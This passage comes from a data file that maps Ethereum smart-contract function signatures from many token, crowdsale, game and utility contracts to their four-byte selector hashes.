"0x3b561709", "Test11()": "0x57946897", "end(string)": "0x900a974e", "DestroyTransferFeeCoin()": "0xce1bd789", "removeQuoter(address)": "0x24496026", "addQuoter(address)": "0xa7da74f8", "price_constant()": "0x9dbf0543", "gwei()": "0x24de3c0e", "countOfParticipants()": "0x12192649", "tokensFor1EthP4()": "0x76495ce7", "team2()": "0xe612c0ad", "PresaleEDUSupply()": "0x18e75a1c", "pings()": "0x1e81ccb2", "withdrawStuck()": "0x67a1bd55", "vestingTeamWallet()": "0xdabb6778", "getAllTeamCosts()": "0xf4338e89", "NUM_RESERVED_COIN()": "0xd69d895e", "minTomoContribution()": "0x2e2e4149", "Withdrawal()": "0x70e44c6a", "winners_count()": "0xfbe6a9b2", "minTransfer()": "0xa4f35b65", "addressIco()": "0x865fe035", "baseValue()": "0x61bb9c52", "claimPlayerWinnings()": "0xdbb47d77", "AgriChainType()": "0xe98fe5ce", "createRetainer()": "0x8d9940b9", "MIN_FUNDING_AMOUNT()": "0xd2a7d38a", "card_start_first()": "0xe740f4fc", "paymentContract()": "0x9c91dd56", "rateForMainICO()": "0xe14c4675", "crowdSaleStop()": "0xc143ab2c", "ICO_PHASE1_LIMIT()": "0xd182d253", "gvOptionToken10()": "0xb6eb15c7", "ChargersCount()": "0x70f705ba", "ADDR_OWNER()": "0x6cbc9ca0", "SILVER_AMOUNT_SKL()": "0x2b11e7f6", "totalTokenCreationCap()": "0xe137cdd9", "DirectFundingProcessed()": "0x64e21c9e", "foundersKey()": "0x389ae4d1", "PRE_ICO_AMOUNT()": "0xd7b33f94", "EGGS_TO_HATCH_1Cat()": "0x452766a5", "exchangeRateChangesBlock()": "0x249f7aa0", "flatFee()": "0xd9eb5947", "tokenRateInUsdCents()": "0x87136940", "marketDrugs()": "0x50dede35", "Securities_2()": "0x6699d9cd", "foundersTokensReserve()": "0x45fcceb4", "party_a()": "0xa3f70ed3", "stage_2_price()": "0xe686b89a", "getTotalRollMade()": "0x9e92c991", "maxLinkedWalletCount()": "0x0c8dfeda", "conversion_rate()": "0xda73f0f9", "privateStartTime()": "0x8a7c63c5", "isLegalTime()": "0x998b894a", "icoWalletAddress()": "0x53ba11d0", "price_exponent2()": "0xa4a5f550", "card_titanium_first()": "0x7f66af09", "secondsPerMonth()": "0x7696c042", "davToken()": "0x8e7952c6", "greenshoeActive()": "0x33911763", "fundReceiver()": "0xfb4aa0a1", "knc()": "0xe61387e0", "kgtHolderCategory()": "0x70cc5e45", "totalBetsMade()": "0x311b2e98", "endDiscountTime()": "0xb3f2ecfd", "marketingFund()": "0xf256b130", "minContributionPresale()": "0xe44a94d3", "teamSupply18Months()": "0x65670adc", "guardian2Vote()": "0x14a1231f", "getFreeMiner()": "0xc572dcc3", "INTERFACE_SIGNATURE_ERC721()": "0xfddf16b7", "distributionPercent()": "0x48f2090b", "getMaximumBetAway()": "0x60f1d148", "compot()": "0xc4cbb591", "stakeContractAddress()": "0x272caf69", "walletETH()": "0x9d0c1e6f", "teamTimelock()": "0x4fed6a10", "getCurrentRateWithBonus()": "0x5fa7dc56", "unlockCurrentAvailableFunds()": "0x2af05d07", "maxCrowdsaleSupplyInWholeTokens()": "0x346fc0dd", "numOfProperties()": "0x190e4c77", "PRESALE_END_DATE()": "0xb644ee41", "webSite()": "0x34a8c392", "nextMineEvent()": "0xf27e2ef6", "referrerFee()": "0x6e88a7bd", "totalETHWagered()": "0x71d5ffbe", "preDGZtoDGZExchangeRate()": "0x3c5fc608", "saleOrNot()": "0x77d6a880", "minimalContribution()": "0xc4a4f265", "startBlockProfit()": "0xcc1d050d", "marketStores()": "0x361cac82", "TEAMS_PER_ENTRY()": "0xd7fd00b0", "lockTeamTokens()": "0x54c93a4e", "DURATION_SALESTAGES()": "0xb5b26505", "withdrawalDeployed()": "0x34eac76f", "INITIAL_CARD_PRICE()": "0x0323e576", "RELEASE_END()": "0x5181aa01", "manualEndDay()": "0x2724e032", "keyPrice()": "0x10e56973", "withdrawOwnersMoney()": "0x53b86342", "senderStake()": "0xf720a453", "mvnperethBonus()": "0x84788f01", "STAGE_1_START()": "0x289e0f82", "initialSuppy()": "0x55915b97", "maxPerUser()": "0x06d586bb", "firstTeamContributorId()": "0x128e3761", "PURCHASE_DIVIDER()": "0x17393f04", "StopCrowdsale()": "0xe37426d4", "FreezedCash()": "0x79799193", "minRate()": "0x0cb60443", "NON_PAYABLE_AMOUNT()": "0x840bc19c", "benefeciar()": "0x1b391d09", "CHINESE_EXCHANGE_2()": "0x7dc0d451", "reserveAllowance()": "0x5f0d5296", "restCandy()": "0xe81fdd77", "lastBlock_v9()": "0x59a0e583", "tierNum()": "0xf3bbc84c", "regex()": "0x55e79d29", "CROWDSALE_AMOUNT()": "0xf9977329", "lastBlock_a11()": "0x56982986", "tokensPerBTC()": "0xddd35de8", "privateFundSupply()": "0xdf482ad5", "maxCapPre()": "0x41ca7242", "last_buyer()": "0x6142101a", "freezedValue()": "0x5f5868db", "sendNowLastCount()": "0xfee24454", "pauseMinting()": "0xda8fbf2a", "miniumInvestment()": "0x06f8ac40", "totAllocation()": "0x2a774c27", "uniq(uint16[])": "0x15992cda", "currentExchangePrice()": "0x8bd76535", "PrivateSaleAddress()": "0x4a700545", "totalSupplyForDivision()": "0x951e17a1", "availableZLT()": "0xecd1c4a5", "p1()": "0xc2a2747b", "mintHelper()": "0x8c28fd6e", "refunds()": "0x8afa46b1", "commonRebate()": "0xbc33f8ef", "optionsCalculator()": "0x736ead2c", "isHardCapReached()": "0x688d3922", "usersCanUnfreeze()": "0x41282fe0", "betRedCoin()": "0x46ff4ce6", "CONTRACTIUM()": "0x85b39fc1", "maxInflationRate()": "0x8502935a", "coinSentToEther()": "0x8ef26a71", "reFunding()": "0x7188c8a4", "numberOfLeaderboardPlayers()": "0xd47ee6c1", "mainSaleWeiCap()": "0x8be909a3", "ethDeposits()": "0x61a99c4b", "USD_CENT_PER_TOKEN()": "0xbc1e9ca3", "depositCount()": "0x2dfdf0b5", "ownerCandidate()": "0x5f504a82", "TrustlessTransactions_TransactionHeight()": "0xbf3986ba", "minerDifficulty()": "0xfe0904e6", "tokenHolders()": "0x953669be", "gameTimeOut()": "0x51c08f4d", "plcrFactory()": "0xad3eb71f", "rounds()": "0xa2e800ad", "DeathFactor_iii()": "0x4e4d02db", "draining()": "0xa0489ac2", "coinsIssuedIco()": "0x83123fa6", "getRecordStateRequiredChanges()": "0xb4b1b6d9", "lifeFactor_iii()": "0x130d993d", "russianBounty()": "0x561187ae", "preSaleTokenSold()": "0xac0c518d", "AMOUNT_TeamSupport()": "0xbb6534a9", "dividendsPayed()": "0xa8103621", "DEVELOPER1()": "0x82b2f95f", "awardAmountPrime()": "0x2b3eb76c", "redTeamLockingPeriod()": "0x8dd21b0f", "contractFeePercentage()": "0xdbd8987c", "fundForTeam()": "0xbd8d34f5", "sanMaxLength()": "0x10adb0ea", "stage1_price()": "0x41ef3879", "artworkCount()": "0xa0876445", "specialManagerCountInt()": "0x855c145b", "lockedDays()": "0x9c08606c", "HGT()": "0xed39eab3", "debugNow()": "0x53400e7f", "superAddress()": "0x45d3b8db", "totalWeiToBeDistributed()": "0x301fbdef", "periodICOStage2()": "0x2bbc9396", "dragonTreasureToken()": "0xc880fab1", "reveal_end_time()": "0x81f799e2", "endDate1()": "0xeb89022e", "raisedUSD()": "0x4635b449", "MIN_STAKE()": "0xcb1c2b5c", "interestDistribution()": "0x36add1df", "ICO_LEVEL_3()": "0x56dcd2fa", "IQT_DECIMALSFACTOR()": "0x432c4209", "HavvenGoldSupply()": "0x1ac68a12", "gamers()": "0xa34574f0", "REFUND_RATE()": "0x9d925fc8", "demurringFeeDenum()": "0x72855080", "startCrowdsalePhase1Date()": "0x99c2b93b", "firstWeekPreICOBonusRate()": "0x00d30eb9", "exchangedNum()": "0x6f29c88a", "CryptoCopyToken()": "0x285bf4c7", "ONE_YEAR_KEEPING()": "0x732d565b", "fundraiserCallData()": "0xc2fa6697", "getKyberNetworkAddress()": "0x3c72a83e", "flexibleReward()": "0xb16c9e59", "periodStage()": "0x7611f50d", "beginCodeUpdate()": "0xba3f41da", "pantry()": "0xc25f75fc", "updateId()": "0xbfcf04cf", "ownerCanWithdraw()": "0x84fdec83", "cancelAuction()": "0x8fa8b790", "startAuction(string,uint256)": "0x862882e5", "nextNextBid()": "0x0a1dfb5a", "nextBid()": "0x27151526", "auctionName()": "0xc63d99db", "timeLeft()": "0x1300a6d1", "getHighestBid()": "0x4979440a", "ROHH()": "0x357bd7d6", "withdrawAllFunds()": "0x49649fbf", "withdrawFoundersTeamAndAdvisors()": "0xf5235a46", "withdrawSoftwareProductDevelopment()": "0x81f1f92a", "withdrawOperationalExpenses()": "0x908b8cfc", "withdrawCashReserveFund()": "0xc8fed3f6", "withdrawMarketingAndCommunityOutreach()": "0x799c0468", "withdrawLegalContingencyFunds()": "0x34100027", "withdrawLongTermFoundationBudget()": "0x09e419d1", "changeMaximumContribution(uint256)": "0xd0297bc6", "changeMinimumContribution(uint256)": "0x92bf2bf1", "distributeFunds()": "0x3a6a4d2e", "KRCPreSaleContract(uint256,address,address)": "0xc265a6c0", "countWhitelists()": "0xca698873", "searchWhitelist(address,address)": "0x6bb20f9b", "getWhitelist()": "0xd01f63f5", "setWhitelist(address,address,string)": "0xbce83d2a", "CCH_OLI_1()": "0xe945e26c", "TwoExRush()": "0xdc46c813", "reservedWithdraw()": "0xfdc4c3eb", "advisoryWithdraw()": "0x81104666", "teamWithdraw()": "0xcfbb7d36", "vestingWithdraw(address,uint256,uint256)": "0x7dbc827b", "finishCrowd()": "0x29cee59e", "newWindow(uint8,uint256)": "0x3b2812ad", "sendTokensWindow(uint8)": "0x98f1e0e7", "closeWindow(uint8)": "0x1470dfa8", "getTokens(address)": "0x450efe21", "calcAmountAt(uint256,uint256,uint256)": "0xb65c3a7f", "fundMinting(address,uint256)": "0xc7669337", "setStartEndTimeTLP(uint256)": "0xa2023ff8", "setMinETHin(uint256)": "0x6bd9b4da", "setReservedWallet(address)": "0x27d42fc0", "setAdvisoryWallet(address)": "0xa3c441e7", "setTeamWallet(address)": "0x1525ff7d", "setFundMintingAgent(address)": "0x4ee0cd98", "stageName()": "0x50637dd2", "running()": "0xd85bd526", "McFlyCrowd(uint256,uint256,address,address,address,address,address,address,address,address,address,address,address,address,address)": "0x24323110", "allowTransfer(address)": "0xb3490bfc", "requestOwnership(address)": "0x8753b16e", "SURT(uint256)": "0x1f3943df", "get_time_locked_contract_size(address)": "0xdf713abd", "release_all(address)": "0x9c293792", "mint_time_locked_token(address,uint256)": "0x4c64cf92", "distribute_private_sale_fund(address,uint256,uint256)": "0x45b17abb", "set_private_sale_total(uint256)": "0x015773b6", "create_public_sale_token(address,uint256)": "0x68e757a0", "NebulaToken()": "0xa5b78bfa", "IagonTestToken()": "0xcf136426", "eosBASE(uint256,uint256)": "0x84b79b3d", "reinvest(address)": "0xb8872fb7", "POAP()": "0xdbe5ca78", "AnyName()": "0x43e1b94f", "AdvisorsTokensHolder(address,address,address)": "0x054dcbb5", "generate(address,uint256)": "0x3807aabd", "initialize(address,address,address,address,address,address,address)": "0x35876476", "TokenContribution()": "0x3c6b97c9", "refillFunds()": "0x5f038b6d", "convertDustToEther(uint256)": "0x831b3f67", "convertEtherToDust()": "0xb4745939", "serviceTransfer(address,address,uint256)": "0x1ffa451c", "setInformation(string)": "0xd7ffbbaa", "Dust()": "0xb4801272", "KVCToken()": "0xf159eb84", "salvageTokensFromContract(address,address,uint256)": "0xa0929cda", "manuallyProcessTransaction(address,uint256)": "0xc7aff0d7", "getVariablesForDapp()": "0x4b79e8ef", "processTransaction(address,uint256)": "0x6a54932c", "checkInternalBalance()": "0x43677ca7", "unlockFunds()": "0xb4d1c485", "closeGame()": "0x786b844b", "manualLockFunds()": "0x4eb06f61", "lockFunds(address)": "0xa6f2e80d", "LuckyTree(uint256,uint256,uint256,uint256)": "0xb53b3f41", "checkIfLockCanBeRemoved(address)": "0xcf1edfea", "removeLock()": "0x4803724e", "removeFailedGame()": "0x10d72742", "createLock(address,uint256,uint256)": "0x650e1505", "isGameApproved(address)": "0xe40dd35b", "changeApproval(address,uint256,uint256)": "0x9281cd65", "getStake(uint256,uint256,address,bytes32)": "0x887ccc82", "getRound(uint256,uint256)": "0x39ec68a3", "getTournament(uint256)": "0x1a5bd7fc", "createRound(uint256,uint256,uint256,uint256)": "0x5bc91b2f", "createTournament(uint256)": "0xdd20a53e", "numeraiTransfer(address,uint256)": "0x7c8d56b8", "destroyStake(address,bytes32,uint256,uint256)": "0xa425b752", "releaseStake(address,bytes32,uint256,uint256,uint256,bool)": "0x5c251cbf", "stakeOnBehalf(address,uint256,bytes32,uint256,uint256,uint256)": "0x63ff195d", "stake(uint256,bytes32,uint256,uint256,uint256)": "0x8b93d3fc", "changeDelegate(address)": "0xe38296e4", "freezeTokens()": "0xda9f4875", "prime()": "0xc7ee005e", "bonusPriceDeltaPerHour()": "0xc92a1ad8", "fundraise_max()": "0x96c28881", "minimalWeiTLP2()": "0x70d1e6b4", "isStartGame()": "0xe3aae11b", "tournamentRewards()": "0xb6823a66", "investWallet()": "0xbc8409a4", "bixToken()": "0xc5b35556", "cofounderA()": "0xf05aa334", "percentBuyBackTypeTwo()": "0xc3e053ac", "check_prize()": "0x18d80d4a", "LockupTokensWithdrawn()": "0x03f9b456", "base_token_seed_amount()": "0x1e4c6f7c", "lowEtherBonusValue()": "0x1179cf71", "devBalance()": "0xcd9a1b63", "isSaleOwner()": "0x79326c01", "GetHoldersCount()": "0x90dc0636", "transferToBeneficiary()": "0x7f069942", "round1EndTime()": "0x39e8d1a4", "FUND_SUPPLY()": "0x0314bcfb", "getUniCoinSize()": "0x3ed28f39", "ieth()": "0xa026946d", "withdrawRemainingTokens()": "0x8afbf669", "teamTokenBonus()": "0x085c1cee", "mintingThreshold()": "0x87b55705", "cancelPlatformWithdrawal()": "0x97ff6d10", "circulationStartTime()": "0x38b9499b", "referrerPercent()": "0x636d98b1", "PreICOEndTime()": "0x9e0d8126", "tokensReleasedToEcosystem()": "0x9848fef8", "minContributionInWei()": "0xa40cd3f3", "optionSupply()": "0x232e57c1", "crr()": "0x68213256", "TOTAL_TOKENS_ICO()": "0x2ebd9242", "TotalICOSupply()": "0x3a525983", "Stage2Deadline()": "0x244b34c5", "recoverAllEth()": "0x25e7e3cf", "ethWithdraw()": "0x540c755f", "jtest()": "0xf8e6b331", "screenstate()": "0xf3e5c15e", "AdvisorsPartners()": "0xd62ac58c", "eggsSold()": "0x407fc2e8", "bonus02()": "0xbb00faca", "changerType()": "0x2ee6f8b6", "totalGenesisAddresses()": "0x1cc54204", "Eplay()": "0xbf354389", "returnUnsold()": "0xb2ea088d", "FACTOR_PRESALE()": "0x51ca0eb8", "playHome()": "0x774dba58", "marketSeeds()": "0xc4359c1b", "totalConsume()": "0xffc8c4cb", "phase_2_Time()": "0x278c3030", "gas_amount()": "0xfb794281", "claimB2()": "0xf380729d", "development()": "0x7b929c27", "icoStartP5()": "0xf393f022", "tokensRemainingIco()": "0x77c34ee7", "Tokens_Per_Dollar_Denominator()": "0xe69506aa", "incentivisingEffortsSupply()": "0xaea48690", "tokenDetails()": "0xd6abe110", "earlyInvestorWallet()": "0x661990bc", "vote_reward_pool_amount()": "0x815bc7a0", "terraformReserve()": "0x3cc3c3b5", "costOfToken()": "0x1bcf468b", "data()": "0x73d4a13a", "ETHtoZWeirate()": "0x1da97544", "reserveManager()": "0xbb004abc", "About()": "0x12ac18ff", "PLATFORM_MONTHLY()": "0x638eea8d", "eventsHistory()": "0xf07629f8", "secondUnlockTime()": "0xe2332120", "defaultNumberJuror()": "0xac74bcde", "waracoin_per_ether()": "0x05eed946", "pregnantPandas()": "0xffa40a4c", "TOKENS_PER_ETHER_PRESALE()": "0x50d5914a", "publicRelease()": "0xe21a430b", "webGiftLineTime()": "0x61c91c69", "privateSaleEndDate()": "0x006c2abc", "tokensReleasedAdvisorsTeam()": "0x05978450", "getMineableSupply()": "0x8f094efb", "oferta()": "0x2541edcc", "lockedAllocation()": "0xdb0834cf", "card_blue_minamount()": "0xf54580cc", "stepLockedToken()": "0x4e79fd7c", "maxMintingTime()": "0xea9362de", "sigBountyProgramEDUSupply()": "0x0d543862", "secondsInBlock()": "0x398f0970", "contributionReward()": "0x18db0750", "INITIAL_BALANCE()": "0x14525bce", "Standard_3()": "0xc946f3af", "lastMintingTime()": "0x2af05c4e", "ref()": "0x21a78f68", "buyable()": "0x88c7e397", "joinedCrowdsalesLen()": "0xebdfa455", "totalAngels()": "0x454ccc2f", "weiWithdrawed()": "0x4a3d239c", "restrictionExpiraton()": "0x4bb37790", "USD_SOFT_CAP()": "0x16ae10f5", "ownerHasClaimedTokens()": "0xcbec72f3", "BitMantas()": "0x3e99a35e", "NTToken()": "0x60136123", "endGame(uint256,string)": "0x8a007f30", "withdrawOnBehalf(address)": "0xa22b97f5", "getPosition()": "0x7398ab18", "getPosition(address)": "0x16c19739", "searchInsertionPoint(uint256,uint256)": "0xa9d49f62", "BirdToken()": "0xc1d1f5c0", "GetOrganNumber()": "0x8b6fb3ac", "GetOwnertName()": "0x12e5b7fa", "GetQueueNumber()": "0xa2798f0a", "unfreez()": "0xce5910f3", "PalavraCoin()": "0x2ac364b4", "getFile(bytes32)": "0x473aa2a5", "addFile(bytes32,string,uint256,string,string)": "0x040d54ce", "adminTrade(uint256[8],address[4],uint8[2],bytes32[4])": "0xeb52e404", "emergencyWithdraw(address,uint256)": "0x95ccea67", "applySetMaxFeeTrade()": "0xab0b29a5", "setMaxFeeTrade(uint256)": "0xa01c489d", "applySetMaxFeeWithdrawal()": "0xf7987a03", "setMaxFeeWithdrawal(uint256)": "0xc1b8847b", "invalidateOrdersBefore(address)": "0xb8e42041", "transferTokens(uint256,address[],address,address)": "0x816bf490", "lottery(uint8)": "0xa80de5ea", "VenusToken(uint256,string,string)": "0xd09f872a", "ZCash()": "0xb6c44bd1", "LotsaFucksToken()": "0x974626b4", "getBalacne()": "0x434786f4", "getGoal()": "0xb97a7d24", "getDonationByAddress(address,address)": "0xd22b64a2", "getMyDonations()": "0x90e4a130", "check_vote(string)": "0x8e7a9687", "get_votes()": "0x94f183cb", "has_voted()": "0x62a44fe9", "has_joined()": "0xc41a9dfe", "get_candidate(uint8)": "0x87dde4ad", "get_candidates()": "0x5d711db1", "vote(uint8,string)": "0xb224c40a", "join_voter()": "0x0e9ef902", "delete_candidate(uint8)": "0xccbde432", "insert_candidate(string,uint8,string,string)": "0x25e1350f", "shut_down()": "0xc1061561", "Prosper()": "0xf19d736e", "viewVotes()": "0xef2fd54d", "voteCandidateTwo()": "0x7fb0fe14", "voteCandidateOne()": "0x9fd8bfb3", "withdrawEtherBalance()": "0x2ec0090a", "withdrawTokenBalance(address)": "0x90bb6153", "airdropTokenDistribution(address,uint256)": "0x30b0e001", "airdropTokenDistributionMulti(address[],uint256[])": "0x2b865dea", "whitelist(address[],uint256[])": "0xcf235743", "multiBuy(address[],bytes32[])": "0x0bdc7953", "removeTrack(bytes32)": "0xa243f512", "getArtistInfo(address)": "0xc247620d", "BlueRedTokenERC20(uint256,string,string)": "0x92223e7a", "bitdncToken()": "0xd1f9f3a0", "_trade(address,uint256,address,uint256,address,uint256)": "0x05021ce9", "trade(address,uint256,address,uint256,uint256,address,uint8,bytes32,bytes32,uint256)": "0xded78d3d", "verifySignature(uint8,bytes32,bytes32,address,bytes32)": "0x543594b8", "cancelOrder(address,uint256,address,uint256,uint256,uint8,bytes32,bytes32)": "0x982371b4", "createOrder(address,uint256,address,uint256,uint256)": "0x96d4f640", "withdrawMaker(address,uint256,address)": "0xb7ff2aed", "withdrawTaker(address,uint256)": "0xf0b7e532", "withdrawTokenMaker(address,uint256,address)": "0x8998ef19", "withdrawEthMaker(uint256,address)": "0x67a19b20", "processDeposit(address,uint256)": "0xc8cd65e5", "Sunny()": "0xe7850f2d", "getAdopters()": "0x3de4eb17", "adopt(uint256)": "0x8588b2c5", "SuperUltraPowerCoin()": "0x2998dff2", "BeaverCoin()": "0x9d248477", "iceToken()": "0xb820c41c", "takeMoney()": "0xfcae8c06", "toss(bool)": "0x58593578", "placeBet(bool)": "0x096a3778", "TroyToken(address,address)": "0x1030e227", "TUMITOKEN(uint256,string,uint8,string)": "0x45b5143b", "updateImplementation(address)": "0x025b22bc", "delistToken(address)": "0xabffc9ac", "checkToken(address)": "0xf1880b24", "listToken(address)": "0x1fc1e25f", "addExcluded(address,address)": "0x57dbefdd", "MyWishCrowdsale(uint256,uint256,uint256)": "0xd8207301", "FinalizableCrowdsale(uint256,uint256,uint256,address)": "0x8f6ac8d7", "getEmployeeInfoById(address)": "0xfc5378bb", "getEmployeeInfo(uint256)": "0xf6757cff", "getEmployerInfo()": "0x8ef8f241", "getPaid()": "0xcf41d6f8", "hasEnoughFund()": "0x23fed09e", "calculateRunway()": "0x4ec19512", "addFund()": "0xa2f09dfa", "updateEmployee(address,uint256)": "0x5e91d8ec", "changePaymentAddress(address,address)": "0xbc456c42", "removeEmployee(address)": "0xd108177a", "addEmployee(address,uint256)": "0xe7fd9a13", "_partialPaid(address)": "0x28c0b0ef", "Payroll()": "0xf8482ca5", "Author()": "0x20b2af52", "addAuthor(bytes)": "0x90d63e5d", "DescartesToken()": "0xf31ed9e6", "addDisagree(bytes32)": "0xd825b510", "addAgree(bytes32)": "0x3a2b4cdf", "UpgradeScheme()": "0x2ad3274f", "getCurrentBalance()": "0xa5749710", "getCreditBitAddress()": "0x6c597e41", "setCreditBondContract(address)": "0xfd03846e", "setCreditBitContract(address)": "0xd4200f94", "lockTokens(uint256)": "0x6e27d889", "withdrawReward(address)": "0xb86e321c", "CreditDAOfund(address)": "0xd2ea7f7f", "test(bytes32)": "0x99372321", "newLoan(bytes32,address,uint256,uint256,uint256,uint256,uint256,uint256)": "0xce23f2b2", "getAllCases()": "0xfb40c22a", "getCaseAtIndex(uint256)": "0xe8ad2369", "getCaseCount()": "0x6c08faf7", "getProgress(uint256)": "0xe11efa06", "updateProgress(uint256,uint256)": "0xaf8255ab", "updateLawyer(uint256,address)": "0x097dced0", "getCase(uint256)": "0xa91a1080", "deleteCase(uint256)": "0xd590bf49", "insertCase(uint256)": "0xee41ed47", "isCase(uint256)": "0x5cf8ca60", "getVoteFromProposal(uint256,uint256)": "0x8c529628", "newProposal(address,string)": "0xe1aba68e", "addElectedMember(address,string)": "0xc677b207", "getMembersCount()": "0x09772f8f", "CongressOwned()": "0xf3f1b5a7", "setEditable(bool)": "0x2cb0d48a", "nthRoot(int256,int8)": "0x72a88673", "expByTable(uint8)": "0x596925d6", "round(int256,int256,bool)": "0x901b9249", "logCeiling(int256,uint8)": "0x35d357ac", "logFloor(int256,uint8)": "0x8e7c9e50", "log10Ceiling(int256)": "0xcb6ad855", "log10Floor(int256)": "0x1ffd3aef", "log2Ceiling(int256)": "0x773e04a9", "log2Floor(int256)": "0xc17b9770", "createCalcFunc()": "0x38eda0e5", "modInverse(int256,int256)": "0x689827b0", "lcm(int256,int256)": "0xc25193ad", "egcd(int256,int256)": "0x39500105", "gcd(int256,int256)": "0x63b03896", "binomial(uint256,uint256)": "0x3a14bf4c", "range(int256,int256,int256)": "0x8359f045", "range(uint256,uint256,uint256)": "0xd35fbbfb", "min(int256[])": "0xaf6afce5", "min(uint256[])": "0xd834e619", "max(int256[])": "0xccc13814", "max(uint256[])": "0x3bf6de96", "factorial(uint256)": "0x83714834", "diff(int256[])": "0xa4aac6ec", "diff(uint256[])": "0x8595c9ff", "diff(int256[],int256)": "0x85a8f42e", "diff(uint256[],uint256)": "0x8462df7f", "sum(int256[])": "0x60cb66d0", "lerp(uint256,uint256,uint256,uint256,uint256)": "0x3c72751e", "eucDist2D(uint256,uint256,uint256,uint256)": "0x71c57772", "intMin(int256)": "0xf83d69db", "intMax(int256)": "0xc2ac0b4a", "uintMax(uint256)": "0xd789b4c1", "updateVisa(address,uint256,uint256,bytes32,uint256,uint256,uint256,uint256)": "0x3b80fac0", "createVisa(address,uint256,bytes32,uint256)": "0x091d709b", "visaLength(address,uint256)": "0x79bfaaeb", "deleteVisaOffering(uint256,uint256)": "0x02340ad6", "visaOfferingsLength(uint256)": "0xc8f09634", "createVisaOffering(uint256,bytes32,bytes32,uint256,uint256,bytes32)": "0xd858ebf4", "updatePassport(address,uint256,bytes32,bool)": "0x6031749c", "setEmbassy(address)": "0x6ca621bd", "setImmigration(address)": "0x270bb8ad", "setCountry(address)": "0x0a193612", "setCitizen(address)": "0x0a16a53f", "trans(uint256)": "0x66c99139", "Ok()": "0xe0c63902", "testInitialContract()": "0x190d9253", "UpgradeableStandard23TokenMock(address,uint256,bytes32,bytes32,uint256)": "0xa07f3bb0", "vote(address,uint256)": "0x5f74bbde", "register(address,string,uint256,string,string,string,bytes20)": "0x4acddfa0", "testFail_doubleVoting()": "0x69bc1a55", "testFail_voterNotCertified()": "0x2b29fbfa", "test_votingWhenCertified()": "0x1c7bfdce", "test_removeFromRegistry()": "0x6f4eb87e", "test_registrationInformationAccurate()": "0xcf53951d", "test_registerWithoutCertification()": "0x86dcbefc", "SendResult(uint64,bytes18,bytes32,bytes11)": "0xe385f7d2", "Register(address,bytes4,bytes18)": "0x61b97435", "KycClaveChain(address)": "0xde50f2fe", "validPLAContract(uint32,uint32)": "0xa426cd19", "validEAContract(uint32,address)": "0x3494ab3d", "pipeMoney()": "0x1e4f95c7", "AgencyWallet(string)": "0x298ac61c", "spaceAfterReturns()": "0x61ef265b", "byte_to_bits(bytes1,uint256)": "0x84ab2cdb", "read_i64_array()": "0xa3dfdf30", "read_i32_array()": "0xef9b0214", "read_i16_array()": "0xe2ce7e67", "read_i8_array()": "0xcc7f8266", "read_u64_array()": "0x5ab2ff61", "read_u32_array()": "0xb0485706", "read_u16_array()": "0xbdfdbf56", "read_u8_array()": "0xca8ee75a", "safeMod(uint256,uint256)": "0x62a144d9", "_transfer(address,uint256,bytes,string)": "0x1534180f", "burnMarketMakerApproval()": "0xa16094d1", "burnAuditApproval()": "0xa9fab274", "burnAdminApproval()": "0x90e10134", "mintMarketMakerApproval()": "0x1f48ff7c", "mintAuditApproval()": "0x684d63bf", "mintAdminApproval()": "0xd195ef83", "setBurnFeeReceiver(address,address)": "0x71a80ba3", "setTransferFeeReceiver(address,address)": "0xeacc501a", "setMintFeeReceiver(address,address)": "0x363a4708", "setBurnFee(uint256)": "0x4bf2c7c9", "setTransferFee(uint256)": "0x8f02bb5b", "setMintFee(uint256)": "0xeddd0d9c", "setMarketMaker(address,address)": "0x6f9cdccd", "setAudit(address,address)": "0x7454e74c", "Zigicoin()": "0xea8a4305", "Crowdsale(address,uint256,address,address)": "0xdbb094ef", "SkribbleToken()": "0x96119f12", "checkReferral(bytes8)": "0x110ae711", "BC2Token()": "0xc1717f80", "ModifyMine(uint256,bool,string,uint256,string)": "0x8bd66bb3", "RegisterMine(string,uint256,uint256)": "0x85318217", "decreaseICOEndTime(uint256)": "0xa5417f64", "decreaseICOStartTime(uint256)": "0x69c7e386", "newProposal(uint256,uint256,bytes32)": "0xe010c686", "getAllGas()": "0x5891215c", "stakeEthForGas(uint256,address)": "0x9d3f2e5f", "setAddGas(address,uint256)": "0x8a8b51b8", "__get(address,uint256)": "0x028ab3b1", "__forward(uint256)": "0x0a703549", "paymentForWeek(uint256)": "0xd14e1784", "weekProcessed(uint256)": "0x3239d232", "getYearIdx()": "0xfd809759", "getWeekIdx()": "0x1042ca73", "paymentOnTime(uint256)": "0x27eeefa6", "processEndOfYear(uint256)": "0xf6903c9c", "removeContractFromTokenFallbackWhiteList(address,address)": "0x08540812", "addContractToTokenFallbackWhiteList(address,address)": "0x9a033782", "CoinsdomCoin(uint256)": "0x45ab8e07", "confirmCertificate(uint256)": "0x4d782655", "approve_reject_deleteCertificate(uint256)": "0xf58951d1", "countRequest()": "0x542ceaad", "applyForCertification(string,string,bool,string,address,string,string)": "0xe474777e", "getSumCourse()": "0x6ee5d676", "addCourse(string,string,string,string,string,string)": "0xece8a29d", "TmoneyTest2()": "0x291fce73", "redeem_withdraw(address,address,uint256)": "0x5217b774", "redeem_deposit(uint256)": "0xfa3f998c", "changeRedeemer(address)": "0x6e317da7", "getDealData(bytes32)": "0xbbdc04d8", "changeStatus(uint8,bytes32)": "0xd37aff82", "addDeal(uint256,uint256,string,string,uint256,bytes32)": "0x53a50f0f", "changeServiceAddress(address)": "0x33862708", "CHRTToken(uint256,string,uint8,string)": "0xee68702c", "PricePredictionBettingGame(address)": "0xb79047cc", "tryTransfer(address,uint256)": "0x010a7d65", "computeEarningsAmount(uint256,uint256,uint256,uint256,uint256)": "0x78c9f9cf", "Cez()": "0xba376923", "VividoTokenTMP()": "0x690f411b", "transferFrom0(address,address,uint256)": "0x25b3bfb8", "transfer0(address,uint256)": "0x6b6ef0ed", "balance(uint256)": "0x47bb89f0", "getAmountToGive(bytes,uint256)": "0x31002556", "getResourceAddress(string)": "0xfcfa63e3", "getResource(string)": "0x65d80117", "setResource(string,string,address)": "0xd1572e4c", "KudosRouter()": "0x4d55a924", "organisationIndex(address)": "0x19b35f3d", "isInDirectory(address)": "0x576f9cba", "removeOrganisation(address)": "0xd1f8a208", "getOrganisation(uint256)": "0x75543074", "getOrganisationsSize()": "0xf31660e9", "getOrganisations()": "0xeaffd429", "upgradeFrom(address,address)": "0x91cf7aca", "KudosOrganisations(address)": "0x2dadf781", "newOrganisation(string,string,string,uint8,bool)": "0x1f91666d", "getDiamond(string)": "0xb35376b5", "reinstate()": "0x28fecd48", "burn(string)": "0xdafa1d2d", "transferInternal(string,address,string,address,string,uint256,uint256)": "0xe74997a8", "updateDiamond(string,string,string,string,string,uint256,uint256,string)": 